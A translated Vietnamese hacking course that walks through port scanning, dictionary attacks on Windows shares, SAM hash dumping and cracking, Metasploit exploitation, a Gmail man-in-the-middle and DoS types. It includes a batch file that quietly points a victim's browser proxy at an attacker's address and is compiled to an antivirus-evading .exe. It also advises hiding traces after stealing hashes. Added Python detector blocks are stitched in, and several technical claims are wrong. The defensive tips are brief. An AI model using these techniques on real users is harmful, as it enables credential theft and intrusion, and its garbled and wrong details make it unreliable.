  • Copyright by Tocbatdat, Research Manager, I-train.com.vn

    I-train.com.vn Professional Training Service

    Attacking and Defending Systems

    Part I. Port scanning in full and how to defend against it
      I. Principles of TCP/IP communication
        1. Structure of a TCP packet
        2. When the client wants to establish a TCP connection to the server, first:
        3. When the client wants to end a session with the server
      II. Principles of port scanning a system
        1. TCP Scan
        2. UDP Scan
      III. Port scanning with Nmap
      IV. Conclusion

    Part I. Attacking user account passwords in Windows
      I. Using the For command in Windows
        1. Decrypting encrypted passwords

    Part II. Attacking Windows systems through security vulnerabilities
        1. Using Retina Network Security Scanner 5.1 to find vulnerabilities on the system

    Part III. Hacking passwords authenticated with certificates and how to defend against it
      I. General background
      II. Tools used
      III. Technique for obtaining a Gmail password
        1. Setting a proxy for the user
        2. Procedure
      I. Detecting and securing a Gmail account
        1. Detecting whether network access goes through a proxy

    Part IV. DoS/DDoS attacks and how to defend against them
      I. History of DoS attacks
        1. Targets
        2. The attacks
      II. Definition of DoS attacks
        1. Purposes of DoS attacks
        2. Targets that attackers commonly hit with DoS attacks
      III. Types of attack
        1. Types of DoS attack
      IV. DoS attack tools
        1. Tools DoS: Jolt2
        2. Tools DoS: Bubonic.c
        3. Tools DoS: Land and LaTierra
        4. Tools DoS: Targa
        5. Tools DoS: Blast 2.0
        6. Tools DoS: Nemesys
        7. Tool DoS: Panther2
        8. Tool DoS: Crazy Pinger
        9. Tool DoS: Some Trouble
        10. DoS Tools: UDP Flood
        11. Tools DoS: FSMAX
      V. Conclusion of part I
      VI. Botnets
        1. Meaning of a bot network
        2. Bot networks
        3. Botnets
        4. Purposes botnets are used for
        5. Types of bot network
        6. Steps to build a botnet? How to analyze a bot network
        7. Diagram of how a system is infected and used by Agobot
      VII. DDoS attack tools
        1. Nuclear Bot
      VIII. DDoS attacks
        1. Characteristics of DDoS attacks
        2. DDoS attacks cannot be completely prevented
        3. The clever attacker
      IX. Classification of DDoS attacks
      X. Reflective DNS attacks
        1. Issues related to Reflective DNS attacks
        2. Reflective DNS attack tool: ihateperl.pl

    Part VI. Editing the Registry from the command line and its security applications
        1. Role of the command line
        2. Creating a .bat file to automate some operations
        3. Configuring the Registry with a .bat file
        4. Applications of Registry configuration
        5. Conclusion

    Part VII. Backdoors and Trojans in full
        1. Introduction to Trojans
        2. Types of Trojan and how they work
        3. Ways a victim's computer gets infected with a Trojan
        4. Ways to recognize a Trojan-infected computer (the most basic; may not be accurate)
        5. Using some types of Trojan
        6. How to hide one or more Trojans in an .exe or other normally running file
        7. How to detect Trojans
        8. How to defend against Trojans and backdoors
        9. Conclusion

    Part VIII. Web hacking via PHP file upload and how to defend against it
      I. Required tools
        1. Burpsuite_v1.3
      II. Technique for uploading a PHP file and taking control of the web server
        1. Preparation
        2. Uploading the PHP file to the website
      III. Techniques for protecting the server

    Part I. Port scanning in full and how to defend against it

    In this article I present the basic principles of port scanning a system and the scanning techniques that reveal which ports a system is using. Building on these scanning concepts, I also present solutions for blocking scans on a system. The article covers:

    1. Principles of TCP/IP communication
    2. Principles and methods of port scanning
    3. Using Nmap

    I. Principles of TCP/IP communication

    1. Structure of a TCP packet

    In this article I focus only on the flag settings in the TCP packet that are used for port scanning:

    - SYN: requests a connection between two computers
    - ACK: replies that the connection between the two machines can begin
    - FIN: ends the connection between the two machines
    - RST: sent by the server to tell the client that this communication is refused (cannot be used)
    - PSH: used in combination with the URG flag
    - URG: sets priority for this packet

    In practice each of these flags appears in the packet as a 1 or a 0: 0 means the TCP packet does not set that flag, 1 means it does. The flags occupy successive bits of the 8-bit Flags field.

    2. When the client wants to establish a TCP connection to the server, first:

    + Step I: The client sends the server a SYN packet.
    + Step II: The server replies to the client with a SYN/ACK packet.
    + Step III: On receiving the SYN/ACK packet, the client sends the server an ACK packet, and the exchange of data between the two machines begins.

    3. When the client wants to end a session with the server

    + Step I: The client sends the server a FIN ACK packet.
    + Step II: The server sends the client an ACK packet.
    + Step III: The server then sends the client a FIN ACK packet.
    + Step IV: The client sends the server an ACK packet, and the connection between server and client is closed.

    II. Principles of port scanning a system.

    1. TCP Scan

    TCP and UDP packets reserve 16 bits for the port number, which means ports run from 1 to 65535. No hacker scans every port on a system; they scan only the most commonly used ports, usually just port 1 through port 1024.

    The sections above covered how two computers on a network set up and tear down a connection. Based on these TCP communication principles, the following methods can determine which ports are open on a system:

    - SYN Scan: The client sends a SYN packet for a given port number to the server. If the server returns a SYN/ACK packet, the client knows that port on the server is open. If the server returns an RST/SYN packet, the port on the server is closed.
    - FIN Scan: The client has no connection to the server but still creates a FIN packet for a given port number and sends it to the server being scanned. If the server returns an ACK packet, the client knows the server has that port open; if the server returns an RST packet, the client knows the server has that port closed.
    - NULL Scan Sure: The client sends the server TCP packets for the port being scanned with no flags set at all. If the server returns an RST packet, the port on the server is closed.
    - XMAS Scan Sorry: The client sends TCP packets for the given port with several flags set, such as FIN, URG and PSH. If the server returns an RST packet, the port on the server is closed.
    - TCP Connect: This method is very direct: it sends the server real connection requests to specific ports. If the server returns a SYN/ACK packet, the client knows the port is open; if the server returns an RST/ACK packet, the client knows the port on the server is closed.
    - ACK Scan: This scan type aims to find the Access Control Lists on the server. The client tries to connect to the server with an ICMP packet; if it receives a Host Unreachable packet, the client understands that the port on the server is filtered.

    There are also several scan types aimed at typical, easily attacked services:

    - RPC Scan: tries to check whether the system has a port open for the RPC service.
    - Windows Scan: similar to ACK Scan, but it may only work on certain ports.
    - FTP Scan: can be used to see whether the FTP service is in use on the server.
    - IDLE: allows checking the state of the server.

    2. UDP Scan.

    Where TCP guarantees packet integrity so that packets always reach their destination, UDP serves the need for fast transfer of small packets. With TCP, an attacker can easily scan which ports a system has open based on the flags in the TCP packet.

    [Figure: structure of a UDP packet]

    As we can see, a UDP packet carries no flags, so the TCP port-scanning methods cannot be used for UDP. Unfortunately, most systems allow ICMP packets.

    If a port is closed, when the server receives the ICMP packet from the client it tries to send the client an ICMP type 3 code 3 packet whose content is port "unreachable". When running a UDP scan, be prepared for results that are not very reliable.

    III. Port scanning with Nmap.

    Nmap is a very powerful port-scanning tool, long famous and trusted by hackers. It supports all the port-scanning methods, and also supports scanning for hostnames and the services running on the system.

    Nmap now has both a graphical and a command-line interface and runs on both *NIX and Windows.

    Nmap is free software; download it from:

    http://nmap.org/download.html

    Below is how to use Nmap to scan:

    C:\nmap-3.93>nmap -h
    Nmap 3.93 Usage: nmap [Scan Type(s)] [Options]
    Some Common Scan Types ('*' options require root privileges)
    * -sS TCP SYN stealth port scan (default if privileged (root))
    -sT TCP connect() port scan (default for unprivileged users)
    * -sU UDP port scan
    -sP ping scan (Find any reachable machines)
    * -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
    -sV Version scan probes open ports determining service and app names/versions
    -sR/-I RPC/Identd scan (use with other scan types)
    Some Common Options (none are required, most can be combined):
    * -O Use TCP/IP fingerprinting to guess remote operating system
    -p ports to scan. Example range: '1-1024,1080,6666,31337'
    -F Only scans ports listed in nmap-services
    -v Verbose. Its use is recommended Use twice for greater effect.
    -P0 Don't ping hosts (needed to scan www.microsoft.com and others)
    * -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
    -6 scans via IPv6 rather than IPv4
    -T General timing policy
    -n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
    -oN/-oX/-oG Output normal/XML/grepable scan logs to
    -iL Get targets from file; Use '-' for stdin
    * -S /-e Specify source address or network interface
    --interactive Go into interactive mode (then press h for help)
    --win_help Windows-specific features
    Example: nmap -v -sS -O www.my.com 192.168.0.0/16 '192.88-90.*.*'
    SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES

    Nmap Scan

    a. Scan types Nmap supports.

    nmap -sT: the s stands for Scan and the T for TCP scan
    nmap -sU: UDP scan
    nmap -sP: ping scan
    nmap -sF: FIN scan
    nmap -sX: XMAS scan
    nmap -sN: NULL scan
    nmap -sV: scans for the names of applications and their versions
    nmap -sR/-I: RPC scan

    b. Advanced options combined with the scan types in Nmap.

    - -O: used to identify the operating system running on the server. For example, to use Nmap with the XMAS scan method and guess the operating system of www.vnexperts.net, the command is: nmap -sX -O www.vnexperts.net
    - -p: the port range to scan
    - -F: only the ports in Nmap's scan list
    - -v: used twice to increase the reliability and effectiveness of whichever scan method is in use.
    - -P0: do not use ping when scanning, in order to cut down on the probing that scan-blocking on websites or servers picks up.

    For example, to scan the website www.vnexperts.net with a UDP scan over ports 1 to 1024, used twice for greater effect, without pinging the site when scanning:

    nmap -sU -p 1-1024 -v -P0 www.vnexperts.net

    Nmap also supports hidden scanning to evade scan detection on the server, for example:

    -Ddecoy_host1,decoy2 to hide the scan.
    -6: scan IPv6

    Nmap also offers options to output results in several different file formats.

    IV. Conclusion.

    Port scanning is one of the first steps in attacking a system; to understand the scanning methods we can use Nmap to carry them out. The way to block scans is then to use dedicated devices such as IPS and IDS to detect and stop the attack.
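The detection side of the flag combinations described above, as an added example that is not part of the original document: it reads the flags field of raw TCP headers, names NULL, FIN and XMAS probes (flag sets that never occur in the normal handshake or teardown shown earlier), and flags a source that sends bare SYNs to many distinct ports in a short window. The function names, the threshold of 10 ports in 5 seconds, and the sample packets (built inline, using documentation addresses) are assumptions.

```python
import struct
from collections import defaultdict

# Classic TCP flag bits, low six bits of the 16-bit offset/flags word.
FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20


def make_segment(src_port, dst_port, flags):
    """Build a minimal 20-byte TCP header (constructed test data, no payload)."""
    offset_flags = (5 << 12) | flags  # data offset = 5 words, then the flags
    return struct.pack("!HHIIHHHH", src_port, dst_port, 0, 0,
                       offset_flags, 1024, 0, 0)


def parse_tcp(segment):
    """Return (src_port, dst_port, flags) from a raw TCP header."""
    if len(segment) < 20:
        raise ValueError("a TCP header is at least 20 bytes")
    src, dst, _seq, _ack, offset_flags = struct.unpack("!HHIIH", segment[:14])
    return src, dst, offset_flags & 0x3F


def classify_probe(flags):
    """Name the scan type whose probe packet carries exactly these flags."""
    if flags == 0:
        return "NULL"
    if flags == FIN:
        return "FIN"          # normal teardown sends FIN together with ACK
    if flags == FIN | PSH | URG:
        return "XMAS"
    if flags == SYN:
        return "SYN"          # also the first packet of every real connection
    return "other"


def detect_scans(events, syn_port_threshold=10, window=5.0):
    """events: (timestamp, src_ip, raw_tcp_header) tuples in time order.

    Returns {src_ip: set of reasons}. NULL/FIN/XMAS packets alert on sight;
    bare SYNs alert only when one source touches many ports inside `window`.
    """
    alerts = defaultdict(set)
    syn_history = defaultdict(list)  # src_ip -> [(timestamp, dst_port)]
    for ts, src_ip, segment in events:
        _sport, dport, flags = parse_tcp(segment)
        kind = classify_probe(flags)
        if kind in ("NULL", "FIN", "XMAS"):
            alerts[src_ip].add(kind + " probe")
        elif kind == "SYN":
            history = syn_history[src_ip]
            history.append((ts, dport))
            while history and ts - history[0][0] > window:
                history.pop(0)  # forget SYNs older than the window
            if len({port for _, port in history}) >= syn_port_threshold:
                alerts[src_ip].add("SYN sweep")
    return dict(alerts)


def sample_events():
    """Constructed traffic: a SYN sweep, two odd-flag probes, one normal client."""
    events = [(i * 0.1, "192.0.2.5", make_segment(40000, port, SYN))
              for i, port in enumerate(range(1, 13))]
    events += [
        (2.0, "192.0.2.9", make_segment(40001, 80, FIN | PSH | URG)),
        (2.1, "192.0.2.9", make_segment(40001, 22, 0)),
        (3.0, "192.0.2.7", make_segment(50000, 443, SYN)),
        (3.1, "192.0.2.7", make_segment(50000, 443, ACK)),
        (3.5, "192.0.2.7", make_segment(50000, 443, PSH | ACK)),
        (4.0, "192.0.2.7", make_segment(50000, 443, FIN | ACK)),
    ]
    return events


if __name__ == "__main__":
    for source, reasons in sorted(detect_scans(sample_events()).items()):
        print(source, sorted(reasons))
```
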

    Part II. Hacking Windows in full and how to defend against it

    Windows is the most widely used operating system in the world, and it always harbours security flaws. In this article I present methods of attacking a computer running Windows. From this knowledge of how such a computer can be attacked, I then give security solutions for the system.

    The article covers:

    1. Attacking account passwords in Windows.
    2. Attacking a Windows computer through security vulnerabilities.

    Part I. Attacking user account passwords in Windows.

    [Figure: lab topology showing the target machine (running Windows 2003), the attacking machine, and a switch]

    I. Using the For command in Windows.

    - The target machine has IP address 192.168.1.18; the attacking machine is on the same 192.168.1.0/24 network.
    - Almost all machines share resources on the network, and one share is hidden and shared by default: \\computer\IPC$
    - Once we know a user on that machine is Administrator, the only question is how to learn that account's password.
    - Create a dictionary file containing most common passwords; the Dictionary Generator tool is used to build this dictionary.
    - Structure of the for command:
    - For /f tokens=1 %a in (vnedic.txt) do net use * \\computer\IPC$ /user:administrator %a
    - Here vnedic.txt is the dictionary file created earlier; Net User is used to map the dictionary file to I: under the name vnedic.txt. After the system worked through the passwords in vnedict.txt, it found that the password of the Administrator account on machine 192.168.1.8 is 123.
    - There are many ways to build a dictionary for attacking a Windows system with the for command.
    - The drawback of this method is that it is very slow against a computer with a complex password.

    Defence against attacks using the For command:

    - In Group Policy, set accounts to lock for 30 minutes after 5 wrong password attempts.

    1. Decrypting encrypted passwords.

    a. On the local machine

    - Suppose you do not know the password of a computer on the network, but you ask its owner to type their password and lend you the computer for a while. The question now is how to learn the password on the machine you are logged on to.
    - Many programs can export the encrypted form of the password to a file, typically PasswordDump and WinPasswordPro; this article uses WinPasswordPro.

    Start WinPasswordPro and import the passwords from the local machine.

    After importing the passwords from the SAM file, we get:

    We then export the list of users and encrypted passwords to a .txt file and send it to our own mail; on our machine we use the same software to decrypt it.

    Opening the exported TXT file shows the encrypted password data.

    Having obtained the encrypted user/password data, we uninstall the program from the victim's machine to avoid exposure, send the file to our mail, and decrypt it on our own machine. This is the time-consuming stage: for a password under 10 characters it takes about 1 hour.

    - Start WinPasswordPro on our machine, choose File -> Import PWDUMP file, and select the path to the encrypted password file.

    After importing the PWDUMP file, pressing Start offers 3 password attack methods:

    + Brute Force
    + Dictionary
    + Smart Table

    I choose the Brute Force method.

    Wait about 15 minutes (this password, which I set, has no special characters, no digits, no capitals, and is 9 characters long).

    - At the end of the process I had decrypted the encrypted password file: user administrator, password vnexperts.

    b. Attacking a remote machine.

    - Exporting the encrypted passwords is simple when we can sit at the victim's machine, but in practice that is rarely possible.
    - With Password Dump we can obtain the encrypted data from a remote machine.
    - Here I use PasswordDump version 6.1.6.

    Above, I use PWDump to take the encrypted username and password data from computer 192.168.1.156 and write it to the file vnehack.txt on C:, then use the Type command to view the file's contents.

    With this data we again use WinPasswordPro to decrypt it. Once we have the Administrator account and its password, what happens next is up to us.

    - Defences against this form of attack:

    + Be wary of people accessing our computers.
    + Set passwords longer than 14 characters that include every character class: special, uppercase, digits, lowercase.
    + Enable the firewall to block PasswordDUMP, and install and update the latest patches from the vendor.
    + Install at least one strong antivirus program.

    These measures disable PWdump, but note that things are entirely different once an attacker holds an account on the system: they will get past most security defences. In this case, with an ordinary user named vne, I can export all the encrypted username and password data on the server.

    Part II. Attacking Windows systems through security vulnerabilities.

    - First we must find the security vulnerabilities.
    - Then exploit the vulnerabilities found.

    1. Using Retina Network Security Scanner 5.1 to find vulnerabilities on the system.

    Start Retina Network Security Scanner:

    To find which machines on the network are online, go to the Discover section.

    To detect security vulnerabilities, use the Audit tab.

    I will use the program to check machine 192.168.1.8.

    Press Start and choose the Complete Scan mode as the scan template:

    After a short wait I got a surprising result: computer 192.168.1.8 has a great many security vulnerabilities.

    - I found a dangerous unfixed flaw on the machine in the RPC service: Windows RPC DCOM Multiple Vulnerabilities.
    - Reading the extended description of this flaw, I found that it allows unauthorised access to that computer.

    Retina Network Security Scanner is a very effective program for scanning systems and finding security vulnerabilities; it is commercial software.

    2. Using Metasploit to exploit.

    - We now use Metasploit to exploit the vulnerabilities Retina just found. Here I use Metasploit 2.7; version 3.0 is now available.

    After installing Metasploit, I start the web interface as follows:

    - After starting MSFWeb, I open IE and enter the address http://127.0.0.1:55555

    - In Filter Modules, select Windows 2003.

    Among the flaws found that Metasploit can exploit on Windows 2003, I find the RPC Service flaw.

    Click this vulnerability.

    The program reports that this vulnerability can be exploited on NT, 2K, XP and 2K3.

    Clicking it, the system lets us use the programs below to exploit this vulnerability.

    I choose Win32_Reverse_vncinject.

    After choosing vncinject, I select the server to exploit: 192.168.1.8

    Press Exploit to exploit the vulnerability.

    The result is striking: I have a remote desktop on that machine without passing through any authentication, and I now have full control of the computer.

    A result that gives security people headaches, but we are not without defences.

    - Defences against these security flaws:

    + Always apply the latest patches from the vendor.
    + Enable the firewall and open only the ports the applications need.
    + Deploy an IDS to detect intrusions.
    + Use a firewall that blocks scanning of running services.

    Part III. Hacking passwords authenticated with certificates and how to defend against it

    In this article I present a technique for hacking passwords on sites that use a certificate for encryption, such as gmail.com or other websites that authenticate in a similar way (SSL, certificates, HTTPS). Because this puts your Gmail password at risk of exposure, the article also shows how to recognise and block the threat.

    I. General background

    - Gmail and other web services usually use HTTPS to encrypt the user/password packet. When the browser encrypts with the certificate Gmail provides, the user/password packet is (almost completely) safe in transit.
    - So where is the gap that lets a password be stolen from such highly secure authentication and encryption?

    The normal authentication process when a user accesses Gmail:

    Step 1: The user accesses gmail.com.
    Step 2: Gmail sends information to Verisign to obtain a certificate.
    Step 3: Verisign returns to Gmail a certificate comprising a public key and a private key.
    Step 4: Gmail sends the user the public key for encrypting the authentication information.
    Step 5: The user encrypts with the public key and sends the result to Gmail.
    Step 6: Gmail decrypts with the private key.

    *Note: the user/password packet sent to Gmail is encrypted with the public key, so only the private key can decrypt it. The private key is kept by Gmail and never sent over the network, so this packet is extremely secure and cannot be decrypted.

    Certificate spoofing technique

    The user's connection to Gmail does not go direct but passes through an intercepting proxy, where the certificate is spoofed.

    Step 1: The user goes to Gmail.
    Step 2: When the user's packet reaches the intercepting proxy, the proxy modifies the information and sends it on to Gmail.
    Step 3: Gmail sends a request to Verisign to generate a certificate.
    Step 4: Verisign returns the certificate to Gmail. Gmail keeps the private key and sends the public key to the requester.
    Step 5: Gmail sends the public key to the intercepting proxy; this key is not passed on to the user.
    Step 6: The intercepting proxy creates a key pair of its own and sends its public key to the user.
    Step 7: The user encrypts the user/pass with this fake public key generated by the proxy and sends it to the proxy. Having generated the key pair itself, the proxy has the private key to decrypt it.
    Step 8: After decrypting the user's packet, the proxy re-encrypts it with the public key Gmail sent and forwards it to Gmail, so authentication still completes.

    *Note: an attacker sitting on the intercepting proxy can therefore learn the user's user/pass. A user who does not notice that traffic passes through an intercepting proxy can have their user/pass exposed despite using very secure authentication methods.

    II. Tools used

    - Burpsuite_v1.3
      Download link: http://www.portswigger.net/suite/burpsuite_v1.3.zip
      This tool acts as an intercepting proxy.
    - Java (Burpsuite is a .jar file that runs on Java)
      Download link: http://sun.com
    - IE, Firefox
    - A tool that sets the proxy from a single file
      I wrote this tool myself as a .bat file, which can also be converted to an .exe; when the user clicks the file it sets the proxy automatically.
    - Quick_Batch_File_Compiler_3.21, a tool that converts a .bat file to an .exe

    III. Technique for obtaining a Gmail password

    - The most common way is a keylogger, but this does not work when strong antivirus programs are present.
    - Exporting information from a web browser such as IE or Firefox. This does not work when the user does not save user/pass in the browser.
    - One further way is certificate spoofing with an intercepting proxy.

    1. Setting a proxy for the user

    - For all of the user's web traffic to pass through the intercepting proxy, a proxy must be set in the user's browser.
    - It can be set by hand (given some way of controlling the victim's computer).
    - Or by getting the user to run an .exe written to set the proxy.

    ********

    Create a .bat file with the following content:

    echo Windows Registry Editor Version 5.00 > 1
    echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings] >2
    echo "MigrateProxy"=dword:00000001 > 3
    echo "ProxyEnable"=dword:00000001 > 4
    echo "ProxyHttp1.1"=dword:00000000 > 5
    echo "ProxyServer"="IP:port" > 6
    echo "ProxyOverride"="" > 7
    copy /b "1"+"2"+"3"+"4"+"5"+"6"+"7" b.reg
    del 1 /f /q
    del 2 /f /q
    del 3 /f /q
    del 4 /f /q
    del 5 /f /q
    del 6 /f /q
    del 7 /f /q
    regedit.exe /s b.reg
    del b.reg /f /q

    ********

    Then use Quick_Batch_File_Compiler_3.21 to convert this file.bat to a file.exe.

    - When the user clicks this file it automatically sets the proxy for IE. Replace IP with the address you need to set; port is the port the proxy uses. Notably, no antivirus program treats this file as a virus.

    - In this article I use a single computer, so the proxy I set in the browser is 127.0.0.1.

    2. Procedure

    Step 1: Install Java

    Step 2: Run Burpsuite

    Step 3: Set the proxy

    Step 4: Open Gmail

    Step 5: Go to the proxy and view the User/Pass

    Step 1: Install Java

    - Download the Java installer from sun.com and install it to prepare the environment for programs that run on Java.

    Step 2: Run Burpsuite

    - After downloading Burpsuite, extract the archive until you reach the .jar file, then stop.

    - Run Burpsuite_v1.3 as the intercepting proxy by double-clicking the .jar file extracted from the download.

    Running the Burpsuite program

    By default the program acts as a proxy only for the machine it runs on. For other machines to use it as a proxy, open the Proxy tab and choose Options, where you can edit the port in use (8080 by default), and clear the "loopback only" check box.

    Switch to the Intercept tab to configure the operating modes of the intercepting proxy.

    - Intercept on: this is the active mode. If someone sets this machine as their proxy, all of their Internet access is managed by the proxy. When a request arrives from the browser, the proxy displays it; its content can be edited, and it reaches the web server only after it is forwarded.

    - We turn this mode off by clicking "Intercept on", which changes to "off". The purpose is that a user going through this software as a proxy can still reach the Internet normally. In this mode the proxy only records the information about what the user accesses on the web.

    Step 3: Set the proxy

    - In IE, set the proxy to address 127.0.0.1, port 8080: IE, Internet Options, Connections tab, LAN Settings button.

    - Or run the file.bat with the content shown above.

    - Converting the file.bat to a file.exe with the tool and running that file.exe also works.

    Step 4: Open Gmail in IE (with the proxy set)

    Opening Gmail shows a certificate error notice; click Continue to go on.

    Google again reports a Certificate Error; you still type the username and password to get into the mailbox.

    I get into the mailbox and the Certificate Error notice is still shown.

    Step 5: Go to the proxy and find the username and password

    - In Burpsuite, switch to the Target tab and choose Site Map.

    - Select the site https://www.google.com, open Accounts, then ServiceLoginAuth. In the right-hand pane choose Request (the information sent to the server) and open Raw: the username and password are shown there.

    I. Detecting the attack and protecting a Gmail account

    To steal a Gmail password this way, the attacker has to get the user's proxy setting pointed at an intercept proxy and then forge the certificate. To detect this and protect a Gmail account you can therefore do the following:

    1. Detect whether your connection goes through a proxy

    Before going onto the Internet, open the proxy settings and check whether any address has been set.

    This check is very useful, but it is cumbersome, hard to keep up, and easily forgotten or skipped.
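    Because the manual check is easy to skip, it can be scripted. The following is an added example, not part of the original article: it parses an exported copy of the Internet Settings key (the value names are the ones written by the file.bat shown earlier) and reports any enabled proxy that is not on an approved list. The sample export, the function names and the approved proxy proxy.corp.example:3128 are constructed for illustration.

```python
import re

# Registry key and value names are the ones the page's file.bat writes.
INTERNET_SETTINGS = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows"
                     r"\CurrentVersion\Internet Settings")

def parse_reg(text):
    """Parse 'Windows Registry Editor Version 5.00' text into {key: {name: value}}.

    Files written by regedit or `reg export` are UTF-16; decode them first.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = keys.setdefault(line[1:-1].lower(), {})
            continue
        m = re.match(r'"([^"]+)"=(.*)$', line)
        if not m or current is None:
            continue  # header line, blank line, or syntax this check does not need
        name, value = m.group(1), m.group(2).strip()
        if value.lower().startswith("dword:"):
            current[name] = int(value[6:], 16)
        elif len(value) >= 2 and value[0] == value[-1] == '"':
            current[name] = value[1:-1].replace("\\\\", "\\")
    return keys

def proxy_endpoints(proxy_server):
    """Split 'host:port' or 'http=h:p;https=h:p' into (scheme, host, port) tuples."""
    out = []
    for part in filter(None, (p.strip() for p in proxy_server.split(";"))):
        scheme, _, addr = part.rpartition("=")
        host, _, port = addr.rpartition(":")
        if not host:
            host, port = addr, ""
        out.append((scheme or "all", host.lower(), port))
    return out

def audit_proxy(reg_text, approved=frozenset()):
    """Return findings for an enabled proxy that is not in `approved` ('host:port' strings)."""
    settings = parse_reg(reg_text).get(INTERNET_SETTINGS.lower(), {})
    if settings.get("ProxyEnable", 0) != 1:
        return []  # no manual proxy is in force
    server = settings.get("ProxyServer", "")
    findings = []
    if not server:
        findings.append("ProxyEnable=1 but ProxyServer is empty")
    for scheme, host, port in proxy_endpoints(server):
        endpoint = f"{host}:{port}" if port else host
        if endpoint in approved:
            continue
        loopback = host == "localhost" or host.startswith("127.")
        kind = "loopback" if loopback else "unapproved"
        findings.append(f"{kind} proxy for {scheme}: {endpoint}")
    if findings and settings.get("ProxyOverride") == "":
        findings.append("ProxyOverride is empty: no site bypasses the proxy")
    return findings

# Constructed sample: what the key looks like after the page's file.bat has run
# with the address used in the article's single-machine walkthrough.
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy"=dword:00000001
"ProxyEnable"=dword:00000001
"ProxyHttp1.1"=dword:00000000
"ProxyServer"="127.0.0.1:8080"
"ProxyOverride"=""
'''

if __name__ == "__main__":
    for finding in audit_proxy(SAMPLE_EXPORT, {"proxy.corp.example:3128"}):
        print("FINDING:", finding)
```

    Run at logon or on a schedule against a fresh export of the key, this gives the same answer as opening the LAN Settings dialog without relying on the user to remember to look.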

    2. Detect a forged certificate

    a. Normal access

    + Opening Gmail does not bring up any pop-up proposing to download a certificate.

    + Click the padlock icon and view the certificate: it was issued by Verisign.

    b. Access through an intercept proxy

    + Opening Gmail brings up a window reporting that the certificate has an error and asking whether to continue. If this sign appears, the user is advised not to continue and to check the safety of the network and the computer before accessing the site.

    + If the user continues into Gmail, the padlock icon is not shown; a Certificate Error icon appears in its place.

    + Viewing this certificate shows that it was not issued by Verisign.

    Note: If the user sees these two signs, it is advised not to continue into Gmail, because your username and password can be stolen. In addition, users should not save passwords for automatic sign-in: if the computer falls into someone else's hands, the information stored in IE or Firefox can easily be extracted. Users should also install antivirus software to block viruses and keyloggers that steal passwords.

    Part IV. DoS/DDoS attacks and how to defend against them

    Contents of this article:

    1. History of DoS and DDoS attacks

    2. Definition: Denial of Service Attack

    3. Types of DoS attack

    4. DoS attack tools

    5. Botnets

    6. DDoS attacks

    7. Classification of DDoS attacks

    8. DDoS attack tools

    9. Computer worms in DDoS attacks

    I. History of DoS attacks

    1. Targets

    - The attacks are usually aimed at large websites and e-commerce organizations on the Internet.

    2. The attacks

    - On 15 August 2003, Microsoft suffered an extremely strong DoS attack that interrupted its websites for 2 hours.

    - At 15:09 GMT on 27 March 2003, the entire English-language version of the Al-Jazeera website was attacked and interrupted for many hours.

    II. Definition of a DoS attack

    A DoS attack is an extremely dangerous kind of attack. To understand it we need to make clear the definition of a DoS attack and the forms it takes.

    - A DoS attack is one in which a person makes a system unusable, or makes it noticeably slower for normal users, by overloading the system's resources.

    - If attackers cannot break into a system, they try to make it collapse so that it can no longer serve normal users. That is a Denial of Service (DoS) attack.

    Although a DoS attack cannot access the system's actual data, it can interrupt the services the system provides. As the definition above says, a DoS attack exploits the weakest points of the system it targets. The purposes of a DoS attack are:

    1. Purposes of a DoS attack

    - To consume network bandwidth and flood the network, so that the network can no longer provide other services to normal users.

    - To break the connection between two machines and prevent access to a service.

    - To prevent specific users from reaching a particular service.

    - To block services so that others cannot access them.

    - When a DoS attack occurs, users accessing the service experience it as:

    + Disable Network - the network is down

    + Disable Organization - the organization cannot operate

    + Financial Loss - money is lost

    2. Resources that attackers typically target in a DoS attack

    As described above, a DoS attack happens when the attacker uses up the system's resources so that the system cannot respond to normal users. The resources usually targeted are:

    - Anything that creates scarcity: limited, non-renewable resources.

    - Network bandwidth, memory, disk, CPU time and data structures are all targets of DoS attacks.

    - Other systems that support the computer network, such as air conditioning, the electrical system, cooling and many other resources of the business. Imagine the power feed to a web server being cut: can users still reach that server?

    - Destroying or changing configuration information.

    - Damaging the physical layer or network equipment, such as the power supply and air conditioning.

    III. Types of attack

    Denial of Service attacks fall into two categories:

    - DoS attack: an attack from one individual or a group of individuals.

    - DDoS attack: an attack from a network of computers set up to attack one specific target.

    1. Types of DoS attack

    - Smurf

    - Buffer Overflow Attack

    - Ping of Death

    - Teardrop

    - SYN Attack

    a. Smurf attack

    - The perpetrator generates a very large volume of ICMP (ping) traffic to the broadcast addresses of many networks, with the source address set to the target of the attack.

    * Note that pinging an address is a two-way process: when machine A pings machine B, machine B replies and the exchange is complete. When I ping the broadcast address of a network, every computer in that network replies to me. If I now change the source address to that of machine C and ping the broadcast address of some network, every computer in that network replies to machine C rather than to me. That is the Smurf attack.

    - As a result the target receives a huge burst of ICMP reply packets, and its network goes down or slows to the point where it cannot provide other services.

    - The effect is amplified when the ping replies come from a set of interconnected networks (a BOT network).

    - The Fraggle attack uses UDP echo and otherwise works like the Smurf attack.

    Figure: a DoS attack of the Smurf type, using ICMP packets to flood out other communication.

    b. Buffer overflow attack

    - A buffer overflow occurs whenever a program writes more information than the capacity of a buffer in memory.

    - The attacker can overwrite data, control the execution of programs and hijack some programs in order to run dangerous code.

    - I described how to exploit this flaw in an earlier article on hacking Windows, also on www.vnexperts.net.

    - Sending an e-mail whose attached file is longer than 256 characters can cause a buffer overflow.

    c. Ping of Death attack

    - The attacker sends IP packets larger than the number of bytes allowed for an IP packet, which is 65,536 bytes.

    - Splitting an IP packet into smaller parts is done at layer II.

    - The splitting can be carried out on an IP packet larger than 65,536 bytes, but the operating system cannot handle a packet of that size and reboots, or simply loses communication.

    - Recognizing that an attacker is sending packets larger than allowed is relatively easy.

    d. Teardrop attack

    - A very large IP packet is split into many smaller parts when it reaches a router.

    - The attacker uses an IP packet with very confusing parameters for splitting it into parts (fragments).

    - If the operating system receives fragments it cannot make sense of, it still tries to rebuild the packet, which takes up some system resources. If this happens continuously, the system has no resources left for other applications or for serving other users.

    e. SYN attack

